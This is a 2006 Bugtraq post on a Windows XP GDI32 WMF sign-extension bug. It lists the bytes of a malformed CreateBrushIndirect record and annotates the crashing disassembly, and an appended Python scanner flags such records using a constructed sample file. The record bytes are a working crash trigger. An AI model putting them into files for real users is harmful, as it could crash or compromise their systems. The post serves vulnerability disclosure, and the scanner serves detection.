Bugtraq: 0-day XP SP2 wmf exploit (some details)

From: cyanid-E <biz4rre_at_gmail.com>
Date: Mon, 7 Aug 2006 13:05:21 +0400

Here are some technical details.

1. 'Bad' wmf record:

07 00 00 00

length of record (in words)

FC 02

type (CreateBrushIndirect)

08 00 00 00 00 00 00 80

'packed' (good old Win16 days) LOGBRUSH data:

08 00 - 'packed' lbStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)

2. Sign extension bug:

   GDI32!_CommonEnumMetaFile:
      ......
      ; normalize 'packed' LOGBRUSH
      movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
      mov [ebp-0f8], eax
      mov eax, [ebx + 8] ; COLORREF (as is)
      mov [ebp-0f4], eax
      movsx eax, word ptr [ebx+0c] ; <-- BUGBUG: lbHatch (UINT32(INT16))
      lea eax, [ebp-0f8]
      push eax
      call GDI32!_CreateBrushIndirect
      ......

3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:

GDI32!_CreateBrushIndirect:
      ......
      ......
      ......
      cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
      jz _go2crush
      ......
      cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
      jz _go2crush
      ......
_go2crush:
      push esi
      push 1
      push eax, [ebp+10]
      push eax
      push dword ptr [ebp+0c] ; 1
      push dword ptr [ebp+18] ; lbHatch (fake *packedDIB)
      call GDI32!_pbmiConvertInfo
      ......
      ......
GDI32!_pbmiConvertInfo:
      ......
      push ebx
      mov ebx, [ebp+8] ; lbHatch (fake *packedDIB)
      ......
      mov eax, [ebx] ; <-- BUGBUG: crash or random (in first 0x7f00 bytes)
                                       ; memory access (see @ 0x3000 region)

regards,
cyanid-E
Received on Aug 07 2006
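A defender-side check for the record described in the post, as an added example that is not part of the original message: it walks the records of a WMF stream, decodes the packed LOGBRUSH of every CreateBrushIndirect (0x02FC) record, reproduces the movsx widening of the 16-bit lbHatch field, and flags records whose lbStyle (BS_DIBPATTERNPT = 6 or BS_DIBPATTERN8X8 = 8) makes GDI treat that widened value as a pointer to a packed DIB. The sample WMF bytes (standard 18-byte header, a benign solid brush, the record from the post, an EOF record) are constructed here; the code assumes no placeable header precedes the standard one.

```python
"""Scan a WMF stream for CreateBrushIndirect records whose packed LOGBRUSH
would be mishandled by the sign-extension bug described in the post.

Added example, not code from the original message. Assumes a standard
18-byte METAHEADER (no placeable header) followed by records laid out as
4-byte size in words, 2-byte function code, then parameters.
"""
import struct

META_CREATEBRUSHINDIRECT = 0x02FC
META_EOF = 0x0000
BS_DIBPATTERNPT = 6
BS_DIBPATTERN8X8 = 8
WMF_HEADER_SIZE = 18  # standard METAHEADER, 9 words


def sign_extend16(value):
    """Mimic movsx: treat a 16-bit value as INT16 and widen to a 32-bit UINT."""
    value &= 0xFFFF
    if value & 0x8000:
        value -= 0x10000
    return value & 0xFFFFFFFF


def iter_records(data, offset=WMF_HEADER_SIZE):
    """Yield (offset, record_function, params) for each WMF record."""
    end = len(data)
    while offset + 6 <= end:
        size_words, func = struct.unpack_from("<IH", data, offset)
        size_bytes = size_words * 2
        if size_words < 3 or offset + size_bytes > end:
            raise ValueError("malformed record at offset %d" % offset)
        params = data[offset + 6:offset + size_bytes]
        yield offset, func, params
        if func == META_EOF:
            break
        offset += size_bytes


def inspect_brush(params):
    """Decode a packed LOGBRUSH; report whether lbHatch would be used as a pointer."""
    if len(params) < 8:
        return None
    lb_style, lb_color, lb_hatch = struct.unpack_from("<HIH", params, 0)
    pointer_style = lb_style in (BS_DIBPATTERNPT, BS_DIBPATTERN8X8)
    return {
        "lbStyle": lb_style,
        "lbColor": lb_color,
        "lbHatch": lb_hatch,
        # What GDI32 ends up holding after the movsx on the 16-bit field.
        "lbHatch_sign_extended": sign_extend16(lb_hatch),
        # For these styles the widened 16-bit field becomes a *packedDIB pointer.
        "suspicious": pointer_style,
    }


def scan(data):
    """Return the suspicious CreateBrushIndirect findings in a WMF stream."""
    findings = []
    for offset, func, params in iter_records(data):
        if func != META_CREATEBRUSHINDIRECT:
            continue
        info = inspect_brush(params)
        if info and info["suspicious"]:
            info["offset"] = offset
            findings.append(info)
    return findings


# Constructed sample: header + benign solid brush + the record from the post + EOF.
SAMPLE_HEADER = struct.pack("<HHHIHIH", 1, 9, 0x300, 0, 2, 7, 0)
BENIGN_BRUSH = (struct.pack("<IH", 7, META_CREATEBRUSHINDIRECT)
                + struct.pack("<HIH", 0, 0x00FF00, 0))  # BS_SOLID, green, no hatch
BAD_BRUSH = bytes.fromhex("07000000FC020800000000000080")  # bytes quoted in the post
EOF_RECORD = struct.pack("<IH", 3, META_EOF)
SAMPLE_WMF = SAMPLE_HEADER + BENIGN_BRUSH + BAD_BRUSH + EOF_RECORD

if __name__ == "__main__":
    for f in scan(SAMPLE_WMF):
        print("offset 0x%x: lbStyle=%d lbHatch=0x%04x -> 0x%08x"
              % (f["offset"], f["lbStyle"], f["lbHatch"], f["lbHatch_sign_extended"]))
```

Run on the constructed sample, only the second brush record is reported: lbStyle 8 with lbHatch 0x8000, which the movsx widens to 0xFFFF8000. A real scanner would also have to handle the 22-byte placeable header and check lbStyle 6 and 8 records of any size, but the decision rule stays the same: a 16-bit hatch field is never a valid pointer, so any record that makes GDI dereference one is worth rejecting.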